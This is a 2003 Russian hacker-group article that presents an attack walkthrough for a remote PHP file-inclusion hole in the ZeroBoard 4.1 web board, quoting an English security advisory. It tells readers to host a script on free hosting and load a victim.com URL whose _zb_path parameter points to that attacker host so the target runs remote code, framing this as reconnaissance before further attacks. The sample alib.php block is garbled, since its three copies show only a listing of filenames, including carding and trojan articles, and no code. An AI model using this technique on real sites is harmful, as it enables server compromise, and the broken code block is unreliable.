======================================================================
# #
# Author: {dr}{nerve} // k0dsweb gr0up #
# Статья является собственностью команды KODSWEB #
# Любое растпространение без нашего ведома строго запрещено. #
# -= 1.03.2003 =- #
# #
======================================================================
# #
# Атаки класса PHP Source Injection #
# #
======================================================================
В этой статье пойдет речь о довольно распространенных WEB-атаках
класса PHP Source Injection.
Уязвимости данного рода довольно часто встречаются в разнообразных
форумах и PHP движках для сайтов.
Суть уязвимостей дла атак классы PHP Source Injection состоит в
возможности внедрения своего PHP кода в PHP код скрипта, выполняемого
на сервере.
Как то раз бродил я по сети и решил покопаться в одном из сайтов,
почекить его, так сказать. Мое внимание привлекла борда ZeroBoard 4.1.
И вспомнил я, что видел как-то уязвимость этой борды в одном из
багтраков. Метнулся я на поиски. Минут через пять у меня уже был под
рукой сплоит. Ниже приведена оригинальная версия эксплоита:
======================================================================
######################################################################
######################################################################
======================================================================
From: I'm I
Date: 17 июня 2002 г.
Subject: malicious PHP source injection
----------------------------------------------------------------------
JCC Security Advisory
June 15, 2002
malicious PHP source injection
Description
Zeroboard is one of popular PHP web boards in Korea.
When allow_url_fopen = On and register_globals = On in php.ini,
Zeroboard has vulnerability because _head.php contains dangerous codes.
So an attacker can include any files into server's PHP codes.
Impact
All versions of Zeroboard 4.x.
Workaround
allow_url_fopen = off and register_globals = off.
Tested systems
Zeroboard 4.1pl2 Debian GNU/Linux SID(x86)
Background
We checked the vulnerability with
"http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE" and
made a sample code, alib.php,
--------------------alib.php--------------
1.txt
3dfx_vs_nvidia.php
Apache-miniHOWTO.txt
ISSAdmTv1.10beta.txt
Nessus-HOWTO.txt
WinRoutePro424setup.txt
addtexts
again_uins.php
anonproxy.php
aon_wh.php
apache_php_set.php
apprazgon_celpen.php
army_kmb.php
boxes_classific.php
brutus_use.php
bugs_s_umom.txt
carding_1.php
carding_additionals.php
carding_get_verify_account.php
carding_paypal.php
carding_paypal_registration.php
carding_tricks_part1.php
cart32.txt
cels2far.pl
cgi_scanner.php
cgi_security.txt
cgisc_overview.php
chmod.php
cl_serv_trojans.php
comp_protection.php
comtek_2002.php
cookie_thief_attack.txt
cross-site-scripting.php
ddos.txt
disciples2_crack.php
domofon.php
dos_theory.php
dospehi_baita_ili_podbiraem_korpus.php
dvd-show_2001.php
eggdrop_bot_irc.php
eggdrop_com1.php
flash5_1.php
flood_vs_antiflood.php
fotoforum_2002.php
free_inet.php
fricking_inside.php
fw_settings.php
golova_i_2_uxa.php
hi-fi_show_2002.php
hide_threat.php
hiding_tracks.php
how_servers_are_hacked.txt
hserv_examples.txt
htaccess_bug.php
icq_maxsec.php
icq_proxy.php
ie_graphics_xss.txt
interfc_defaced.php
internetcom_2001.php
intro_to_sploits.txt
ip_list.php
ip_list_peter.php
irc_attack.php
irc_can_admin.php
it-format_2001.php
it-format_and_netcom_2002.php
jtr_support.php
jtr_work_process.php
kiberskvottery.php
kodsweb_inside.php
kwt_serial_numbers_microsoft_product_keys_2002.txt
linux_security.txt
lma_lm_vs_ntlm_responses.php
log_s_adminom.php
logic_des_crack.php
magic_of_word.php
modern_razgon.php
monitor_panels.php
nakrutka_voting.txt
netsec_st1.php
netsec_st2.php
off_ctrl_alt_del.php
opengl_1.php
perl_module_installation.php
perlcoding_1.php
perlcoding_2.php
perlcoding_3.php
perlcoding_4.php
perlcoding_5.php
php_mailbomber.txt
php_shell.txt
php_source_injection.txt
phpbb2bug.php
pop3.php
pora_mne_v_armiyu.php
radiobug.php
radmin.txt
rawsock.php
rawsock.txt
reestr_nt_2000.php
referer_fake.php
restorator_gui.php
samba.txt
sc.scr
scan_ports.php
scan_sh_cgi.php
server_po_errors.txt
setcursorpos.php
sh-coding.txt
shell_through_router.txt
simpleportsc.php
smtp_dialog.php
social_engineering.php
socks_vs_http.php
soft_for_unix_hack.php
some_more_frontpage_bugs.txt
sound_inside.php
sql_1.php
sql_basics.php
sql_basics_2.php
ssi_techn.php
switchoff_as_in.php
sysopt.php
taskbar_mustdie.php
tcpipstek_struc.php
trojans_instruction.php
trojans_stports.php
two_more_shells.txt
uin_takeaccount.php
unicodebug.php
unix.txt
unix_perspectives.php
upb_advcampaign.php
video_market.php
viruses_fight.php
viruses_fight_spo.php
vzlom_email_account.php
vzlom_frontpage.php
vzlom_mifi.php
vzlom_provaidera_phpbb2.php
vzlom_sql.php
w2k_net_examples.txt
w2k_network.txt
w2k_rootkit.txt
webmail_bug.txt
webserver_protection.txt
whatisnet_dns.php
win_reestr.php
zvuk_slovo.php
-----------------------------------------
and type the following URL to invoke this sample code.
TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"
-------out put----------------------------
_foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php
apply_vote.php check_user_id.php comment_ok.php config.php data del_comment.php
del_comment_ok.php delete.php delete_ok.php download.php error.php icon
image_box.php images include index.html install.php install1.php install2.php
install2_ok.php install_ok.php latest_skin lib.php license.txt list_all.php
login.php login_check.php logout.php lostid.php lostid_search.php member_join.php
member_join_ok.php member_memo.php member_memo2.php member_memo3.php
member_modify.php member_modify_ok.php member_out.php open_window.php
outlogin.php outlogin_skin schema.sql script select_list_all.php send_message.php
setup.php skin style.css view.php view_info.php view_info2.php view_preview.php
vote.php write.php write_ok.php zboard.php zipcode
Fatal error: Call to undefined function: dbconn() in
/home/morris/public_html/tmp/bbs/_head.php on line 41
-----------------------------------------
thx for BlackNight at r0ar
---
http://jcc.hackerslab.org(at morris Chang)
e-mail : morris@xsdeny.net
======================================================================
######################################################################
######################################################################
======================================================================
-== ПРИСТУПИМ ==-
Само описание, как заюзать данную уязвимость записано тут:
http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE"
and made a sample code, alib.php,
--------------------alib.php--------------
1.txt
3dfx_vs_nvidia.php
Apache-miniHOWTO.txt
ISSAdmTv1.10beta.txt
Nessus-HOWTO.txt
WinRoutePro424setup.txt
addtexts
again_uins.php
anonproxy.php
aon_wh.php
apache_php_set.php
apprazgon_celpen.php
army_kmb.php
boxes_classific.php
brutus_use.php
bugs_s_umom.txt
carding_1.php
carding_additionals.php
carding_get_verify_account.php
carding_paypal.php
carding_paypal_registration.php
carding_tricks_part1.php
cart32.txt
cels2far.pl
cgi_scanner.php
cgi_security.txt
cgisc_overview.php
chmod.php
cl_serv_trojans.php
comp_protection.php
comtek_2002.php
cookie_thief_attack.txt
cross-site-scripting.php
ddos.txt
disciples2_crack.php
domofon.php
dos_theory.php
dospehi_baita_ili_podbiraem_korpus.php
dvd-show_2001.php
eggdrop_bot_irc.php
eggdrop_com1.php
flash5_1.php
flood_vs_antiflood.php
fotoforum_2002.php
free_inet.php
fricking_inside.php
fw_settings.php
golova_i_2_uxa.php
hi-fi_show_2002.php
hide_threat.php
hiding_tracks.php
how_servers_are_hacked.txt
hserv_examples.txt
htaccess_bug.php
icq_maxsec.php
icq_proxy.php
ie_graphics_xss.txt
interfc_defaced.php
internetcom_2001.php
intro_to_sploits.txt
ip_list.php
ip_list_peter.php
irc_attack.php
irc_can_admin.php
it-format_2001.php
it-format_and_netcom_2002.php
jtr_support.php
jtr_work_process.php
kiberskvottery.php
kodsweb_inside.php
kwt_serial_numbers_microsoft_product_keys_2002.txt
linux_security.txt
lma_lm_vs_ntlm_responses.php
log_s_adminom.php
logic_des_crack.php
magic_of_word.php
modern_razgon.php
monitor_panels.php
nakrutka_voting.txt
netsec_st1.php
netsec_st2.php
off_ctrl_alt_del.php
opengl_1.php
perl_module_installation.php
perlcoding_1.php
perlcoding_2.php
perlcoding_3.php
perlcoding_4.php
perlcoding_5.php
php_mailbomber.txt
php_shell.txt
php_source_injection.txt
phpbb2bug.php
pop3.php
pora_mne_v_armiyu.php
radiobug.php
radmin.txt
rawsock.php
rawsock.txt
reestr_nt_2000.php
referer_fake.php
restorator_gui.php
samba.txt
sc.scr
scan_ports.php
scan_sh_cgi.php
server_po_errors.txt
setcursorpos.php
sh-coding.txt
shell_through_router.txt
simpleportsc.php
smtp_dialog.php
social_engineering.php
socks_vs_http.php
soft_for_unix_hack.php
some_more_frontpage_bugs.txt
sound_inside.php
sql_1.php
sql_basics.php
sql_basics_2.php
ssi_techn.php
switchoff_as_in.php
sysopt.php
taskbar_mustdie.php
tcpipstek_struc.php
trojans_instruction.php
trojans_stports.php
two_more_shells.txt
uin_takeaccount.php
unicodebug.php
unix.txt
unix_perspectives.php
upb_advcampaign.php
video_market.php
viruses_fight.php
viruses_fight_spo.php
vzlom_email_account.php
vzlom_frontpage.php
vzlom_mifi.php
vzlom_provaidera_phpbb2.php
vzlom_sql.php
w2k_net_examples.txt
w2k_network.txt
w2k_rootkit.txt
webmail_bug.txt
webserver_protection.txt
whatisnet_dns.php
win_reestr.php
zvuk_slovo.php
-----------------------------------------
and type the following URL to invoke this sample code.
TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"
======================================================================
######################################################################
######################################################################
======================================================================
Делаем прям как тут написано:
Созаем:
--------------------alib.php--------------
1.txt
3dfx_vs_nvidia.php
Apache-miniHOWTO.txt
ISSAdmTv1.10beta.txt
Nessus-HOWTO.txt
WinRoutePro424setup.txt
addtexts
again_uins.php
anonproxy.php
aon_wh.php
apache_php_set.php
apprazgon_celpen.php
army_kmb.php
boxes_classific.php
brutus_use.php
bugs_s_umom.txt
carding_1.php
carding_additionals.php
carding_get_verify_account.php
carding_paypal.php
carding_paypal_registration.php
carding_tricks_part1.php
cart32.txt
cels2far.pl
cgi_scanner.php
cgi_security.txt
cgisc_overview.php
chmod.php
cl_serv_trojans.php
comp_protection.php
comtek_2002.php
cookie_thief_attack.txt
cross-site-scripting.php
ddos.txt
disciples2_crack.php
domofon.php
dos_theory.php
dospehi_baita_ili_podbiraem_korpus.php
dvd-show_2001.php
eggdrop_bot_irc.php
eggdrop_com1.php
flash5_1.php
flood_vs_antiflood.php
fotoforum_2002.php
free_inet.php
fricking_inside.php
fw_settings.php
golova_i_2_uxa.php
hi-fi_show_2002.php
hide_threat.php
hiding_tracks.php
how_servers_are_hacked.txt
hserv_examples.txt
htaccess_bug.php
icq_maxsec.php
icq_proxy.php
ie_graphics_xss.txt
interfc_defaced.php
internetcom_2001.php
intro_to_sploits.txt
ip_list.php
ip_list_peter.php
irc_attack.php
irc_can_admin.php
it-format_2001.php
it-format_and_netcom_2002.php
jtr_support.php
jtr_work_process.php
kiberskvottery.php
kodsweb_inside.php
kwt_serial_numbers_microsoft_product_keys_2002.txt
linux_security.txt
lma_lm_vs_ntlm_responses.php
log_s_adminom.php
logic_des_crack.php
magic_of_word.php
modern_razgon.php
monitor_panels.php
nakrutka_voting.txt
netsec_st1.php
netsec_st2.php
off_ctrl_alt_del.php
opengl_1.php
perl_module_installation.php
perlcoding_1.php
perlcoding_2.php
perlcoding_3.php
perlcoding_4.php
perlcoding_5.php
php_mailbomber.txt
php_shell.txt
php_source_injection.txt
phpbb2bug.php
pop3.php
pora_mne_v_armiyu.php
radiobug.php
radmin.txt
rawsock.php
rawsock.txt
reestr_nt_2000.php
referer_fake.php
restorator_gui.php
samba.txt
sc.scr
scan_ports.php
scan_sh_cgi.php
server_po_errors.txt
setcursorpos.php
sh-coding.txt
shell_through_router.txt
simpleportsc.php
smtp_dialog.php
social_engineering.php
socks_vs_http.php
soft_for_unix_hack.php
some_more_frontpage_bugs.txt
sound_inside.php
sql_1.php
sql_basics.php
sql_basics_2.php
ssi_techn.php
switchoff_as_in.php
sysopt.php
taskbar_mustdie.php
tcpipstek_struc.php
trojans_instruction.php
trojans_stports.php
two_more_shells.txt
uin_takeaccount.php
unicodebug.php
unix.txt
unix_perspectives.php
upb_advcampaign.php
video_market.php
viruses_fight.php
viruses_fight_spo.php
vzlom_email_account.php
vzlom_frontpage.php
vzlom_mifi.php
vzlom_provaidera_phpbb2.php
vzlom_sql.php
w2k_net_examples.txt
w2k_network.txt
w2k_rootkit.txt
webmail_bug.txt
webserver_protection.txt
whatisnet_dns.php
win_reestr.php
zvuk_slovo.php
------------------------------------------
Далее идем на халявный хостинг с ftp доступом, регистрируемся
(к примеру, www.hacker.narod.ru) и заливаем туда alib.php в корневую директорию.
Тогда путь к этому файлу для вас будет http://www.hacker.narod.ru/alib.php
Далее вбиваем в броузер:
http://www.victim.com/zb41/_head.php?_zb_path=http://www.hacker.narod.ru/a
и обновляем страницу броузера через F5. Запрос серверу будет послан и команда выполнится.
--------------------броузер выдаст--------
admin admin.php admin_sendmail_ok.php admin_setup.php apply_vote.php board_header.html
check_user_id.php comment_ok.php config.php data del_comment_ok.php del_comment.php
delete_ok.php delete.php download.php error.php ext.php _foot.php _head.php icon
image_box.php images include install1.php install2_ok.php install2.php install_ok.php
install.php latest_skin lib.php license.txt linuz_member.php linuz_view_member.php
list_all.php login_check.php login.php logout.php lostid.php lostid_search.php
member_join_ok.php member_join.php member_memo2.php member_memo3.php member_memo.php
member_modify_ok.php member_modify.php member_out.php mem_list.php open_window.php
outlogin.php outlogin_skin schema.sql script select_list_all.php send_message.php
setup.php skin style.css view_info2.php view_info.php view.php view_preview.php
vote.php write_ok.php write.php x.php zboard.php zipcode
Fatal error: Call to undefined function: dbconn() in /home/nettist/public_html/zb41/_head.php on line 40
------------------------------------------
Таким образом данная уязвимость позволяет удаленно выполнять команды на сервере
и проводить разведку боем перед дальнейшими действиями.
Все отзывы/предложения принимаются по адресу: admin@kodsweb.ru
[k0dsweb] kodsweb.ru
Подборка смс: смс поздравления пошлые и смс боксы